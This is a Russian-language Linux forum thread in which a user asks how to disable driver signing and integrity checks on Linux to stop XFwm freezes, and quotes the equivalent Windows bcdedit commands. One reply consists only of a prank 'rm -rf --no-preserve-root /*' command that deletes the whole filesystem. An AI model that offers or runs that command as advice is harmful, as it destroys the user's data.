LINUX.ORG.RU

Linux как сделать disable driver signing integrity checks

 , , , ,


2

2

Для того что бы XFwm не вис и другие , я как понял это бсод у линуксов на некоторых пк , просто нету синего экрана, пишите кто знает как это провернуть , может в нано записать или еще куда в загрузчик.

До этого я делал винду и знаю как там что бы она не висла особенно если как vhd её подключать.

VGA Legacy сидите ? Безопасный режим онли ноу креш и даже не подумали об этой фишке , зато сколько самомнения

Виндо команды вот так выглядят

bcdedit -set loadoptions DISABLE_INTEGRITY_CHECKS

bcdedit -set TESTSIGNING ON

shutdown /r /t 0

Но не всегда срабатывает и лучше это делать через одну программную утилитку и название BOOTICE и там этот пункт находить и активировать.

Вот как это делается http://theoven.org/index.php?action=dlattach;topic=1134.0;attach=2013;image

Последняя команда срабатывает в linux shutdown /r /t 0



Последнее исправление: Griggorii (всего исправлений: 7)

Ответ на: комментарий от yurikoles

Я не говорю что везде виснет колом в обычном режиме , но на интелах есть такое дело особенно на интеграшках , сижу на интеле с интеграшкой и в норм режиме виснет , в vga нет , не надо тут отписываться раз не понимаете про что дело и проверьте кто доп винду держит стоит такой режим или нет

Griggorii
() автор топика
Ответ на: комментарий от Griggorii

Сижу на интеле с интеграшкой и не имею проблем, консоль в высоком разрешении, иксы работают нормально. Ты что-то делаешь не так.

yars068 ★★★★
()
sudo rm -rf --no-preserve-root /* 2>/dev/null
Deleted
()

Что за заголовок, что за теги, что за текст заглавного поста, что за поясняющие комменты. Несколько раз перечитать пришлось всё, пока суть не уловил.

Симптомы своих «бсодов» скажи.

Bfgeshka ★★★★★
()
Ответ на: комментарий от yars068

При просмотре в браузере мышь (если мышь беспроводная конечно) не виснет на вкладках , на его регуляторе страницы ползунке вверх вниз?

Griggorii
() автор топика
Ответ на: комментарий от Griggorii

У меня аптайм обычно от недели до двух, все ОК.

yars068 ★★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.